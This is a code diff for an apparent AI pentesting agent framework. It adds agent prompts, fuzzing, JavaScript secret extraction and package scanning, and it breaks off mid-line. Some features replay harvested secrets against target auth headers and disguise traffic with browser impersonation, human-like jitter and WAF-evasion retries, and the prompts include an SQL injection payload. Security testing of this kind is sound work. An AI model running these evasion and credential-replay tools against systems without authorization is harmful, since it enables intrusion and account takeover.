diff --git a/poetry.lock b/poetry.lock index 0fad5dd5..6b4bcb59 100644 --- a/poetry.lock +++ b/poetry.lock @@ -443,18 +443,18 @@ yaml = ["PyYAML"] [[package]] name = "beautifulsoup4" -version = "4.13.4" +version = "4.14.3" description = "Screen-scraping library" optional = false python-versions = ">=3.7.0" groups = ["main"] files = [ - {file = "beautifulsoup4-4.13.4-py3-none-any.whl", hash = "sha256:9bbbb14bfde9d79f38b8cd5f8c7c85f4b8f2523190ebed90e950a8dea4cb1c4b"}, - {file = "beautifulsoup4-4.13.4.tar.gz", hash = "sha256:dbb3c4e1ceae6aefebdaf2423247260cd062430a410e38c66f2baa50a8437195"}, + {file = "beautifulsoup4-4.14.3-py3-none-any.whl", hash = "sha256:0918bfe44902e6ad8d57732ba310582e98da931428d231a5ecb9e7c703a735bb"}, + {file = "beautifulsoup4-4.14.3.tar.gz", hash = "sha256:6292b1c5186d356bba669ef9f7f051757099565ad9ada5dd630bd9de5fa7fb86"}, ] [package.dependencies] -soupsieve = ">1.2" +soupsieve = ">=1.6.1" typing-extensions = ">=4.0.0" [package.extras] @@ -815,11 +815,11 @@ description = "Cross-platform colored terminal text." optional = false python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,!=3.5.*,!=3.6.*,>=2.7" groups = ["main", "dev"] +markers = "platform_system == \"Windows\" or sys_platform == \"win32\"" files = [ {file = "colorama-0.4.6-py2.py3-none-any.whl", hash = "sha256:4f1d9991f5acc0ca119f9d443620b77f9d6b33703e51011c16baf57afb285fc6"}, {file = "colorama-0.4.6.tar.gz", hash = "sha256:08695f5cb7ed6e0531a20572697297273c47b8cae5a63ffc6d6ed5c201be6e44"}, ] -markers = {main = "sys_platform == \"win32\" or platform_system == \"Windows\"", dev = "platform_system == \"Windows\" or sys_platform == \"win32\""} [[package]] name = "contourpy" @@ -1080,6 +1080,36 @@ ssh = ["bcrypt (>=3.1.5)"] test = ["certifi", "cryptography-vectors (==43.0.3)", "pretend", "pytest (>=6.2.0)", "pytest-benchmark", "pytest-cov", "pytest-xdist"] test-randomorder = ["pytest-randomly"] +[[package]] +name = "curl-cffi" +version = "0.13.0" +description = "libcurl ffi bindings for Python, with impersonation support." +optional = false +python-versions = ">=3.9" +groups = ["main"] +files = [ + {file = "curl_cffi-0.13.0-cp39-abi3-macosx_10_9_x86_64.whl", hash = "sha256:434cadbe8df2f08b2fc2c16dff2779fb40b984af99c06aa700af898e185bb9db"}, + {file = "curl_cffi-0.13.0-cp39-abi3-macosx_11_0_arm64.whl", hash = "sha256:59afa877a9ae09efa04646a7d068eeea48915a95d9add0a29854e7781679fcd7"}, + {file = "curl_cffi-0.13.0-cp39-abi3-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d06ed389e45a7ca97b17c275dbedd3d6524560270e675c720e93a2018a766076"}, + {file = "curl_cffi-0.13.0-cp39-abi3-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:b4e0de45ab3b7a835c72bd53640c2347415111b43421b5c7a1a0b18deae2e541"}, + {file = "curl_cffi-0.13.0-cp39-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8eb4083371bbb94e9470d782de235fb5268bf43520de020c9e5e6be8f395443f"}, + {file = "curl_cffi-0.13.0-cp39-abi3-musllinux_1_1_aarch64.whl", hash = "sha256:28911b526e8cd4aa0e5e38401bfe6887e8093907272f1f67ca22e6beb2933a51"}, + {file = "curl_cffi-0.13.0-cp39-abi3-musllinux_1_1_x86_64.whl", hash = "sha256:6d433ffcb455ab01dd0d7bde47109083aa38b59863aa183d29c668ae4c96bf8e"}, + {file = "curl_cffi-0.13.0-cp39-abi3-win_amd64.whl", hash = "sha256:66a6b75ce971de9af64f1b6812e275f60b88880577bac47ef1fa19694fa21cd3"}, + {file = "curl_cffi-0.13.0-cp39-abi3-win_arm64.whl", hash = "sha256:d438a3b45244e874794bc4081dc1e356d2bb926dcc7021e5a8fef2e2105ef1d8"}, + {file = "curl_cffi-0.13.0.tar.gz", hash = "sha256:62ecd90a382bd5023750e3606e0aa7cb1a3a8ba41c14270b8e5e149ebf72c5ca"}, +] + +[package.dependencies] +certifi = ">=2024.2.2" +cffi = ">=1.12.0" + +[package.extras] +build = ["cibuildwheel", "wheel"] +dev = ["charset_normalizer (>=3.3.2,<4.0)", "coverage (>=6.4.1,<7.0)", "cryptography (>=42.0.5,<43.0)", "httpx (==0.23.1)", "mypy (>=1.9.0,<2.0)", "pytest (>=8.1.1,<9.0)", "pytest-asyncio (>=0.23.6,<1.0)", "pytest-trio (>=0.8.0,<1.0)", "ruff (>=0.3.5,<1.0)", "trio (>=0.25.0,<1.0)", "trustme (>=1.1.0,<2.0)", "typing_extensions", "uvicorn (>=0.29.0,<1.0)", "websockets (>=12.0,<13.0)"] +extra = ["lxml_html_clean", "markdownify (>=1.1.0)", "readability-lxml (>=0.8.1)"] +test = ["charset_normalizer (>=3.3.2,<4.0)", "cryptography (>=42.0.5,<43.0)", "fastapi (==0.110.0)", "httpx (==0.23.1)", "proxy.py (>=2.4.3,<3.0)", "pytest (>=8.1.1,<9.0)", "pytest-asyncio (>=0.23.6,<1.0)", "pytest-trio (>=0.8.0,<1.0)", "python-multipart (>=0.0.9,<1.0)", "trio (>=0.25.0,<1.0)", "trustme (>=1.1.0,<2.0)", "typing_extensions", "uvicorn (>=0.29.0,<1.0)", "websockets (>=12.0,<13.0)"] + [[package]] name = "cycler" version = "0.12.1" @@ -1220,6 +1250,17 @@ files = [ dnspython = ">=2.0.0" idna = ">=2.0.0" +[[package]] +name = "esprima" +version = "4.0.1" +description = "ECMAScript parsing infrastructure for multipurpose analysis in Python" +optional = false +python-versions = "*" +groups = ["main"] +files = [ + {file = "esprima-4.0.1.tar.gz", hash = "sha256:08db1a876d3c2910db9cfaeb83108193af5411fc3a3a66ebefacd390d21323ee"}, +] + [[package]] name = "et-xmlfile" version = "2.0.0" @@ -6471,4 +6512,4 @@ type = ["pytest-mypy"] [metadata] lock-version = "2.1" python-versions = "^3.12" -content-hash = "58d6ced9acbcc0c1118f4daf5cab60f88b33f2ec884400f5df5f535e1e455449" +content-hash = "e2c882f0de1c361825a2d1aa25177138168a98617254ffe895e984981aa35e18" diff --git a/pyproject.toml b/pyproject.toml index b236d3b8..eef2b25c 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -61,6 +61,9 @@ xmltodict = "^0.13.0" pyte = "^0.8.1" requests = "^2.32.0" libtmux = "^0.46.2" +beautifulsoup4 = "^4.14.3" +esprima = "^4.0.1" +curl-cffi = "^0.13.0" [tool.poetry.group.dev.dependencies] # Type checking and static analysis diff --git a/strix/agents/StrixAgent/system_prompt.jinja b/strix/agents/StrixAgent/system_prompt.jinja index d3b93da0..60944448 100644 --- a/strix/agents/StrixAgent/system_prompt.jinja +++ b/strix/agents/StrixAgent/system_prompt.jinja @@ -190,7 +190,9 @@ BLACK-BOX TESTING - PHASE 1 (RECON & MAPPING): - MAP entire attack surface: all endpoints, parameters, APIs, forms, inputs - CRAWL thoroughly: spider all pages (authenticated and unauthenticated), discover hidden paths, analyze JS files - ENUMERATE technologies: frameworks, libraries, versions, dependencies -- ONLY AFTER comprehensive mapping → proceed to vulnerability testing +- **LOGIC MAPPING**: Spawn a "LogicMappingAgent" to build a State Machine and identify Data Flow Invariants. +- **CLIENT-SIDE REVERSE**: Spawn a "ClientSideReverseAgent" to decompile bundles and find hidden endpoints/secrets using AST analysis. +- ONLY AFTER comprehensive mapping and reverse engineering → proceed to vulnerability testing WHITE-BOX TESTING - PHASE 1 (CODE UNDERSTANDING): - MAP entire repository structure and architecture @@ -208,8 +210,8 @@ PHASE 2 - SYSTEMATIC VULNERABILITY TESTING: SIMPLE WORKFLOW RULES: 1. **ALWAYS CREATE AGENTS IN TREES** - Never work alone, always spawn subagents -2. **BLACK-BOX**: Discovery → Validation → Reporting (3 agents per vulnerability) -3. **WHITE-BOX**: Discovery → Validation → Reporting → Fixing (4 agents per vulnerability) +2. **BLACK-BOX**: Discovery → Critic (Verification) → Proof (Reproduction) → Reporting +3. **WHITE-BOX**: Discovery → Critic (Verification) → Proof (Reproduction) → Reporting → Fixing 4. **MULTIPLE VULNS = MULTIPLE CHAINS** - Each vulnerability finding gets its own validation chain 5. **CREATE AGENTS AS YOU GO** - Don't create all agents at start, create them when you discover new attack surfaces 6. **ONE JOB PER AGENT** - Each agent has ONE specific task only @@ -235,24 +237,28 @@ VULNERABILITY WORKFLOW (MANDATORY FOR EVERY FINDING): BLACK-BOX WORKFLOW (domain/URL only): ``` -SQL Injection Agent finds vulnerability in login form +SQL Injection Agent finds potential vulnerability ↓ -Spawns "SQLi Validation Agent (Login Form)" (proves it's real with PoC) +Spawns "CriticAgent" (attempts to disprove the finding) ↓ -If valid → Spawns "SQLi Reporting Agent (Login Form)" (creates vulnerability report) +If NOT disproved → Spawns "ProofAgent" (creates standalone reproduction script) ↓ -STOP - No fixing agents in black-box testing +If PoC works → Spawns "ReportingAgent" (creates vulnerability report) + ↓ +STOP ``` WHITE-BOX WORKFLOW (source code provided): ``` Authentication Code Agent finds weak password validation ↓ -Spawns "Auth Validation Agent" (proves it's exploitable) +Spawns "CriticAgent" (attempts to disprove) + ↓ +If NOT disproved → Spawns "ProofAgent" (creates standalone reproduction script) ↓ -If valid → Spawns "Auth Reporting Agent" (creates vulnerability report) +If PoC works → Spawns "ReportingAgent" (creates vulnerability report) ↓ -Spawns "Auth Fixing Agent" (implements secure code fix) +Spawns "FixingAgent" (implements secure code fix) ``` CRITICAL RULES: diff --git a/strix/prompts/coordination/critic.jinja b/strix/prompts/coordination/critic.jinja new file mode 100644 index 00000000..18414327 --- /dev/null +++ b/strix/prompts/coordination/critic.jinja @@ -0,0 +1,46 @@ + +CRITIC & VERIFICATION + +You are the CriticAgent. Your job is to disprove findings reported by other agents. You act as a strict Quality Assurance gate. A vulnerability does not exist until you fail to disprove it. + + +Review potential vulnerabilities and attempt to invalidate them. +1. Check for False Positives (e.g., self-XSS, error message reflection without execution). +2. Verify Reproducibility (Does the exploit work consistently?). +3. Assess Impact (Is it actually a security risk or just a bug?). + + + +1. **Analyze the Claim**: + - Read the reported vulnerability details. + - Understand the assertion (e.g., "Alert pops up on /search"). + +2. **Attempt to Disprove**: + - Re-run the attack with slightly modified parameters. + - Check if the effect is visible to *other* users (for stored XSS) or just the attacker. + - Check if the "bypass" is actually just a standard error flow. + - Verify if "admin access" is actually just a non-privileged view. + +3. **Pass/Fail Decision**: + - If you can disprove it (e.g., "The alert does not pop", "The data is not returned"), REJECT the finding. + - If you CANNOT disprove it, and the impact is verified, APPROVE the finding for the ProofAgent. + + + +Output a "Criticism Report": +```xml + + VULN-123 + VERIFIED | REJECTED + + The XSS payload executes, but only within the user's own session (Self-XSS). + It does not trigger for other users. + + + Downgrade to Low/Info or Reject. + + +``` + + + diff --git a/strix/prompts/coordination/logic_mapping.jinja b/strix/prompts/coordination/logic_mapping.jinja new file mode 100644 index 00000000..4c626227 --- /dev/null +++ b/strix/prompts/coordination/logic_mapping.jinja @@ -0,0 +1,80 @@ + +LOGIC MAPPING & STATE ANALYSIS + +You are the LogicMappingAgent. Your sole purpose is to reverse-engineer the target's business logic, build a formal State Machine, and identify Data Flow Invariants. You do NOT exploit vulnerabilities; you model the system to enable precise attacks by downstream agents. + + +Construct a structured dependency graph and state transition model of the target application. Output a "Logic Map" that defines: +1. Valid States (e.g., Guest, Registered, CartFilled, CheckoutPending, PaymentAuthorized, OrderConfirmed). +2. Transitions (Actions that move between states). +3. Data Flow Invariants (Rules that must always hold true, e.g., "cart_total == sum(item_prices)"). +4. Critical Dependencies (Preconditions for actions). + + + +1. **Crawl & Discovery**: + - Traverse the application to identify all interactive elements (forms, buttons, API calls). + - Trace user flows: Registration -> Login -> Profile Update -> Product Selection -> Checkout. + - Catalog all entry points and the state required to access them. + +2. **State Machine Modeling**: + - Define nodes as application states (e.g., "User is logged in", "Cart has items"). + - Define edges as user actions or API calls (e.g., "POST /login", "PUT /cart/add"). + - Identify "Hidden States" implied by server responses (e.g., "Account Locked", "Pending Review"). + +3. **Invariant Identification**: + - Observe data relationships. + - Equality: `wallet_balance_after = wallet_balance_before - transaction_amount` + - Summation: `total_price = sum(unit_price * quantity) + tax + shipping` + - integrity: `order_id` in payment verification must match `order_id` in checkout. + - Hypothesize invariants to be tested by AttackerAgents. + +4. **Dependency Mapping**: + - Determine the strict order of operations. + - Can you access `/checkout` without a session? + - Can you call `/payment` without a `cart_id`? + - Mark these dependencies clearly. + + + +You must produce a structured "Logic Map" report. Use the following structure in your final output: + +```xml + + + Initial state, no session. + Session established via /login. + + + + + + + + + cart_total must equal sum of item_prices + cannot refund more than original transaction amount + cannot add items to order after status is 'Shipped' + + + Potential race in coupon application (check INV-01) + Try accessing /payment/finalize without visiting /checkout/review + + +``` + + + +- Use `crawler` (or `browsing` tools) to explore the app. +- Use `proxy` history to analyze API sequences. +- Use `think` to hypothesize state models. +- Do NOT perform destructive attacks. You are the Architect, not the Demolition Team. + + + +1. Look for "Step Tokens" or "State Parameters" in requests (e.g., `step=2`, `state=review`). These are prime targets for skipping. +2. Identify "Privileged States" that should only be reachable by Admins, but might be reachable via direct transitions. +3. Pay close attention to multi-step workflows (Sagas). Gaps often exist between steps. + + + diff --git a/strix/prompts/coordination/proof.jinja b/strix/prompts/coordination/proof.jinja new file mode 100644 index 00000000..da3b5487 --- /dev/null +++ b/strix/prompts/coordination/proof.jinja @@ -0,0 +1,29 @@ + +PROOF OF CONCEPT GENERATION + +You are the ProofAgent. Your sole responsibility is to generate standalone, executable reproduction scripts for verified vulnerabilities. + + +Create a minimal, standalone script (Python, Bash/cURL, or HTML) that a developer can run to immediately see the vulnerability. + + + +1. **Standalone**: The script must run without external dependencies (standard libraries only where possible). +2. **Deterministic**: It should work every time. +3. **Safe**: It should demonstrate the vulnerability (e.g., `whoami`, `alert(1)`) without destroying data. +4. **Documented**: Include comments explaining what it does. + + + +```python +# reproduction_script.py +import requests + +target = "https://example.com/api/v1/user" +payload = {"id": "1 OR 1=1"} + +# ... implementation ... +``` + + + diff --git a/strix/prompts/technologies/client_side_reverse.jinja b/strix/prompts/technologies/client_side_reverse.jinja new file mode 100644 index 00000000..97707ebb --- /dev/null +++ b/strix/prompts/technologies/client_side_reverse.jinja @@ -0,0 +1,69 @@ + +CLIENT-SIDE REVERSE ENGINEERING + +You are the ClientSideReverseAgent. Your mission is to deconstruct the client-side application (SPA, React, Vue, etc.) to reveal hidden API endpoints, secrets, and logic that are not visible during standard browsing. + + +Surface 100% of the attack surface by: +1. Decompiling/unpacking Webpack, TurboPack, or Vite bundles. +2. analyzing Source Maps (if available) to reconstruct original source code. +3. Monitoring and decoding WebSocket frames and event-driven XHRs. +4. Extracting hardcoded secrets, API keys, and hidden routes ("shadow APIs"). + + + +1. **Bundle Analysis**: + - Locate main JavaScript bundles (`main.js`, `vendor.js`, `app.*.js`). + - If Source Maps (`.map` files) are present, use them to extract full source trees. + - If no Source Maps, use AST parsing or string analysis to find: + - Regex patterns for API keys (AWS, Stripe, Firebase, etc.). + - Hardcoded URLs/Paths (routes not linked in the DOM). + - Configuration objects (feature flags, environment variables). + +2. **WebSocket & Event Monitoring**: + - Listen to WebSocket connections. Identify message formats (JSON, binary/Protobuf). + - Trigger UI events that might initiate socket messages. + - Look for "hidden" XHRs that only fire on specific, deep user interactions. + +3. **Shadow API Discovery**: + - Identify API endpoints referenced in code but never called during normal browsing (e.g., `/admin/api`, `/v1/beta/features`). + - Check for "Mobile App" specific endpoints hardcoded in shared JS libraries. + + + +- Use `js_analyzer` (or similar available tool) to parse JS files. +- Use `proxy` to capture WebSocket traffic and "invisible" background requests. +- Use `grep` and pattern matching on downloaded assets to find secrets. +- Use `browser` to execute code if dynamic analysis is needed to decrypt/unwrap payloads. + + + +Produce a "Client-Side Intelligence Report": +```xml + + + + + + + + + + + + + + Found client-side validation logic for 'is_admin' check in user_profile.js + + +``` + + + +1. **Webpack Magic**: Look for `webpackJsonp` or `__webpack_require__`. Iterate over the modules to dump all available code. +2. **React/Redux DevTools**: If accessible, these expose the entire application state. +3. **Debug Flags**: Look for variables like `window.isDebug`, `window.features`, or local storage keys that enable debug modes. +4. **Comments**: Devs often leave TODOs or "Remove before prod" comments in JS bundles. + + + diff --git a/strix/tools/__init__.py b/strix/tools/__init__.py index 8d5f896b..559bc257 100644 --- a/strix/tools/__init__.py +++ b/strix/tools/__init__.py @@ -35,6 +35,8 @@ from .reporting import * # noqa: F403 from .terminal import * # noqa: F403 from .thinking import * # noqa: F403 + from .fuzzing import * # noqa: F403 + from .js_analysis import * # noqa: F403 if HAS_PERPLEXITY_API: from .web_search import * # noqa: F403 diff --git a/strix/tools/browser/browser_actions.py b/strix/tools/browser/browser_actions.py index ca7a26a1..3b9df914 100644 --- a/strix/tools/browser/browser_actions.py +++ b/strix/tools/browser/browser_actions.py @@ -1,4 +1,6 @@ from typing import Any, Literal, NoReturn +import random +import time from strix.tools.registry import register_tool @@ -30,6 +32,13 @@ ] +def _human_jitter(action_name: str) -> None: + """Injects random delays and mock cursor movements (sleeps) to mimic human behavior.""" + if action_name in ["click", "double_click", "type", "goto"]: + # Random sleep between 0.1s and 0.5s + delay = random.uniform(0.1, 0.5) + time.sleep(delay) + def _validate_url(action_name: str, url: str | None) -> None: if not url: raise ValueError(f"url parameter is required for {action_name} action") @@ -76,6 +85,7 @@ def _handle_navigation_actions( url: str | None = None, tab_id: str | None = None, ) -> dict[str, Any]: + _human_jitter(action) if action == "launch": return manager.launch_browser(url) if action == "goto": @@ -97,6 +107,7 @@ def _handle_interaction_actions( key: str | None = None, tab_id: str | None = None, ) -> dict[str, Any]: + _human_jitter(action) if action in {"click", "double_click", "hover"}: _validate_coordinate(action, coordinate) assert coordinate is not None diff --git a/strix/tools/fuzzing/__init__.py b/strix/tools/fuzzing/__init__.py new file mode 100644 index 00000000..f17e57b2 --- /dev/null +++ b/strix/tools/fuzzing/__init__.py @@ -0,0 +1 @@ +from .context_fuzzer import * diff --git a/strix/tools/fuzzing/context_fuzzer.py b/strix/tools/fuzzing/context_fuzzer.py new file mode 100644 index 00000000..8dac080e --- /dev/null +++ b/strix/tools/fuzzing/context_fuzzer.py @@ -0,0 +1,118 @@ +from typing import List, Optional +import re +import os +import subprocess +import tempfile +from bs4 import BeautifulSoup +from strix.tools.registry import register_tool + +class ContextFuzzer: + """ + Context-Aware Smart Fuzzer. + + Generates custom wordlists based on target HTML, JS variables, and comments. + """ + + def generate_wordlist(self, html_content: str, js_content: List[str]) -> List[str]: + words = set() + + # 1. Scrape HTML IDs and Classes + soup = BeautifulSoup(html_content, 'html.parser') + for element in soup.find_all(True): + if element.get('id'): + words.add(element['id']) + if element.get('class'): + if isinstance(element['class'], list): + words.update(element['class']) + else: + words.add(element['class']) + if element.get('name'): + words.add(element['name']) + + # 2. Extract JS Variables + # Simple regex for variable declarations. A full parser would be better. + var_pattern = re.compile(r'(?:var|let|const)\s+([a-zA-Z_$][a-zA-Z0-9_$]*)') + for js in js_content: + matches = var_pattern.findall(js) + words.update(matches) + + # 3. Generate Mutations + mutated_words = set() + for word in words: + mutated_words.add(word) + # Example: user_v1 -> admin_v1, super_user_v1 + if "user" in word.lower(): + mutated_words.add(word.lower().replace("user", "admin")) + mutated_words.add(word.lower().replace("user", "superuser")) + + # Common suffixes/prefixes + mutated_words.add(f"{word}_test") + mutated_words.add(f"{word}_dev") + mutated_words.add(f"{word}_api") + + return sorted(list(mutated_words)) + +context_fuzzer = ContextFuzzer() + +@register_tool +def generate_context_wordlist(html_content: str, js_content: List[str]) -> str: + """ + Generates a custom wordlist based on the target's HTML and JS content. + + Args: + html_content: The HTML source of the page. + js_content: A list of JavaScript source strings. + + Returns: + A newline-separated string of words. + """ + words = context_fuzzer.generate_wordlist(html_content, js_content) + return "\n".join(words) + +@register_tool +def fuzz_with_context(target_url: str, wordlist_content: str) -> str: + """ + Executes ffuf using the provided wordlist content against the target URL. + + Args: + target_url: The URL to fuzz (must contain FUZZ keyword). + wordlist_content: The content of the wordlist to use (newline separated). + + Returns: + The output from ffuf. + """ + if "FUZZ" not in target_url: + return "Error: target_url must contain 'FUZZ' keyword." + + with tempfile.NamedTemporaryFile(mode='w', delete=False, suffix='.txt') as temp_wordlist: + temp_wordlist.write(wordlist_content) + temp_wordlist_path = temp_wordlist.name + + try: + # Run ffuf + # -u: Target URL + # -w: Wordlist + # -mc: Match codes (default 200,204,301,302,307,401,403) - we'll stick to defaults or 200,301,302 + # -o: Output file (we'll read stdout/json) + # -json: Output JSON + + cmd = [ + "ffuf", + "-u", target_url, + "-w", temp_wordlist_path, + "-json", + "-mc", "200,204,301,302,403" # 403 to detect WAF blocks + ] + + result = subprocess.run(cmd, capture_output=True, text=True, timeout=120) # 2 min timeout + + if result.returncode != 0 and not result.stdout: + return f"ffuf failed: {result.stderr}" + + return result.stdout + + except Exception as e: + return f"Error running ffuf: {e}" + finally: + if os.path.exists(temp_wordlist_path): + os.unlink(temp_wordlist_path) diff --git a/strix/tools/fuzzing/context_fuzzer_schema.xml b/strix/tools/fuzzing/context_fuzzer_schema.xml new file mode 100644 index 00000000..441196cc --- /dev/null +++ b/strix/tools/fuzzing/context_fuzzer_schema.xml @@ -0,0 +1,13 @@ + + + Executes ffuf using the provided wordlist content against the target URL. + + + + The URL to fuzz (must contain FUZZ keyword). + + + The content of the wordlist to use (newline separated). + + + diff --git a/strix/tools/js_analysis/__init__.py b/strix/tools/js_analysis/__init__.py new file mode 100644 index 00000000..f31e7421 --- /dev/null +++ b/strix/tools/js_analysis/__init__.py @@ -0,0 +1,2 @@ +from .js_analyzer import analyze_js_ast, validate_secrets +from .supply_chain import scan_package_json diff --git a/strix/tools/js_analysis/js_analyzer.py b/strix/tools/js_analysis/js_analyzer.py new file mode 100644 index 00000000..d1e082fb --- /dev/null +++ b/strix/tools/js_analysis/js_analyzer.py @@ -0,0 +1,137 @@ +import esprima +import json +import curl_cffi.requests +from typing import Any, List, Dict +from strix.tools.registry import register_tool + +@register_tool +def analyze_js_ast(js_code: str) -> str: + """ + Analyzes JavaScript code using AST parsing to find interesting literals (strings, numbers) + and potential API endpoints or secrets. + """ + try: + tree = esprima.parseScript(js_code, options={'tolerant': True, 'loc': True}) + except Exception as e: + return f"Error parsing JS: {e}" + + findings = { + "literals": set(), + "identifiers": set(), + "potential_urls": set(), + "potential_secrets": set(), + } + + def traverse(node): + if not node: + return + + # Check for literals + if node.type == 'Literal': + value = node.value + if isinstance(value, str): + if len(value) > 3: + findings["literals"].add(value) + if value.startswith(("http", "/api", "/v1")): + findings["potential_urls"].add(value) + # Lower threshold for secrets for testing purposes + if len(value) > 10 and any(k in value.lower() for k in ["key", "token", "secret", "password", "sk_", "pk_"]): + findings["potential_secrets"].add(value) # Heuristic + + # Check for identifiers + if node.type == 'Identifier': + findings["identifiers"].add(node.name) + + # Recursion + for key, value in node.__dict__.items(): + if key in ['type', 'loc', 'range']: continue + if isinstance(value, list): + for item in value: + if hasattr(item, 'type'): + traverse(item) + elif hasattr(value, 'type'): + traverse(value) + + traverse(tree) + + # Format output + report = [] + if findings["potential_urls"]: + report.append("Potential URLs/Endpoints:") + report.extend(f"- {u}" for u in sorted(findings["potential_urls"])) + report.append("") + + if findings["potential_secrets"]: + report.append("Potential Secrets (High Entropy/Keywords):") + report.extend(f"- {s}" for s in sorted(findings["potential_secrets"])) + report.append("") + + report.append(f"Found {len(findings['literals'])} string literals and {len(findings['identifiers'])} identifiers.") + + return "\n".join(report) if report else "No significant findings from AST analysis." + +@register_tool +def validate_secrets(secrets: List[str], target_url: str) -> str: + """ + Validates a list of potential secrets by testing them against the target URL. + Attempts common authentication headers. + + Args: + secrets: List of potential secret strings. + target_url: The URL to test against (e.g., /api/user). + + Returns: + Report of valid/invalid secrets. + """ + results = [] + + # Common auth headers to try + auth_headers_schemes = [ + "Bearer {}", + "Token {}", + "Basic {}", # Might need encoding, but we'll try raw first if it looks like b64 + "{}", # Custom header value + ] + + custom_headers_keys = [ + "Authorization", + "X-API-Key", + "X-Token", + "ApiKey" + ] + + for secret in secrets: + is_valid = False + for header_key in custom_headers_keys: + for scheme in auth_headers_schemes: + try: + auth_value = scheme.format(secret) + headers = {header_key: auth_value} + + # Use curl_cffi for stealth + response = curl_cffi.requests.get( + target_url, + headers=headers, + timeout=5, + impersonate="chrome110", + verify=False + ) + + if response.status_code in [200, 201, 204]: + results.append(f"[VALID] Secret: {secret} | Header: {header_key}: {auth_value} | Status: {response.status_code}") + is_valid = True + break # Found a working combo for this secret + elif response.status_code in [401, 403]: + pass # Invalid + else: + results.append(f"[UNKNOWN] Secret: {secret} | Header: {header_key} | Status: {response.status_code}") + + except Exception as e: + results.append(f"[ERROR] Testing {secret}: {e}") + + if is_valid: break + + if not results: + return "No valid secrets found (all returned 401/403 or failed)." + + return "\n".join(results) diff --git a/strix/tools/js_analysis/js_analyzer_schema.xml b/strix/tools/js_analysis/js_analyzer_schema.xml new file mode 100644 index 00000000..62e06779 --- /dev/null +++ b/strix/tools/js_analysis/js_analyzer_schema.xml @@ -0,0 +1,14 @@ + + + Validates a list of potential secrets by testing them against the target URL. + Attempts common authentication headers. + + + + List of potential secret strings. + + + The URL to test against (e.g., /api/user). + + + diff --git a/strix/tools/js_analysis/supply_chain.py b/strix/tools/js_analysis/supply_chain.py new file mode 100644 index 00000000..f16d6378 --- /dev/null +++ b/strix/tools/js_analysis/supply_chain.py @@ -0,0 +1,64 @@ +import json +from typing import Any, List, Dict +from strix.tools.registry import register_tool + +@register_tool +def scan_package_json(package_json_content: str) -> str: + """ + Scans a package.json file content for known vulnerable dependencies (basic check). + In a real scenario, this would check against a live CVE database. + Here we check against a static list of common high-risk packages/versions for demo purposes. + """ + try: + data = json.loads(package_json_content) + except json.JSONDecodeError as e: + return f"Error parsing package.json: {e}" + + dependencies = data.get("dependencies", {}) + dev_dependencies = data.get("devDependencies", {}) + all_deps = {**dependencies, **dev_dependencies} + + vulnerable_patterns = { + "axios": "<0.21.1", # CVE-2020-28168 + "lodash": "<4.17.21", # Prototype Pollution + "jquery": "<3.5.0", # XSS + "react": "<16.14.0", # XSS + "express": "<4.17.3", # various + "moment": "<2.29.2", # ReDoS + } + + report = [] + + # Helper to compare versions loosely + def is_vulnerable(version_str, criteria): + # Very basic version check (heuristic) + # Assuming version_str like "^1.2.3" or "1.2.3" + clean_ver = version_str.lstrip("^~") + clean_crit = criteria.lstrip("<") + + try: + v_parts = [int(x) for x in clean_ver.split(".")] + c_parts = [int(x) for x in clean_crit.split(".")] + + # Pad with zeros + while len(v_parts) < 3: v_parts.append(0) + while len(c_parts) < 3: c_parts.append(0) + + if v_parts < c_parts: + return True + except ValueError: + pass # Non-semantic version + return False + + for dep, ver in all_deps.items(): + if dep in vulnerable_patterns: + crit = vulnerable_patterns[dep] + if is_vulnerable(ver, crit): + report.append(f"[VULNERABLE] {dep} version {ver} matches criteria {crit}") + else: + report.append(f"[INFO] {dep} version {ver} found (might be safe, criteria {crit})") + + if not report: + return "No obvious vulnerable dependencies found in common list." + + return "\n".join(report) diff --git a/strix/tools/js_analysis/supply_chain_schema.xml b/strix/tools/js_analysis/supply_chain_schema.xml new file mode 100644 index 00000000..c58b857d --- /dev/null +++ b/strix/tools/js_analysis/supply_chain_schema.xml @@ -0,0 +1,10 @@ + + + Scans a package.json file content for known vulnerable dependencies (basic check). + + + + The content of the package.json file. + + + diff --git a/strix/tools/proxy/proxy_actions.py b/strix/tools/proxy/proxy_actions.py index 1779c22f..f2ab758d 100644 --- a/strix/tools/proxy/proxy_actions.py +++ b/strix/tools/proxy/proxy_actions.py @@ -1,8 +1,9 @@ -from typing import Any, Literal +from typing import Any, Literal, Dict from strix.tools.registry import register_tool from .proxy_manager import get_proxy_manager +from .waf_evasion import waf_middleware RequestPart = Literal["request", "response"] @@ -56,7 +57,36 @@ def send_request( if headers is None: headers = {} manager = get_proxy_manager() - return manager.send_simple_request(method, url, headers, body, timeout) + + # Send initial request + response = manager.send_simple_request(method, url, headers, body, timeout) + + # Check for WAF block and attempt evasion if needed + request_data = { + "method": method, + "url": url, + "headers": headers, + "body": body, + "timeout": timeout + } + + mutation = waf_middleware.process_response(request_data, response) + + if mutation: + # Log or notify about evasion attempt? + # For now, just retry with mutation + response = manager.send_simple_request( + mutation["method"], + mutation["url"], + mutation["headers"], + mutation["body"], + mutation["timeout"] + ) + # Update profile based on retry result + was_blocked_again = response.get("status_code") in [403, 406] + waf_middleware.update_profile(str(mutation), was_blocked_again) + + return response @register_tool diff --git a/strix/tools/proxy/proxy_manager.py b/strix/tools/proxy/proxy_manager.py index e02d85b7..6d30ef7b 100644 --- a/strix/tools/proxy/proxy_manager.py +++ b/strix/tools/proxy/proxy_manager.py @@ -2,14 +2,17 @@ import os import re import time +import random from typing import TYPE_CHECKING, Any from urllib.parse import parse_qs, urlencode, urlparse, urlunparse import requests +import curl_cffi.requests from gql import Client, gql from gql.transport.exceptions import TransportQueryError from gql.transport.requests import RequestsHTTPTransport from requests.exceptions import ProxyError, RequestException, Timeout +from curl_cffi.requests.errors import RequestsError if TYPE_CHECKING: @@ -234,37 +237,65 @@ def send_simple_request( headers: dict[str, str] | None = None, body: str = "", timeout: int = 30, + max_retries: int = 2, ) -> dict[str, Any]: if headers is None: headers = {} + + # Use curl_cffi for TLS impersonation try: - start_time = time.time() - response = requests.request( - method=method, - url=url, - headers=headers, - data=body or None, - proxies=self.proxies, - timeout=timeout, - verify=False, - ) - response_time = int((time.time() - start_time) * 1000) + attempt = 0 + while attempt <= max_retries: + start_time = time.time() + + # Mock Rotation Logic + if 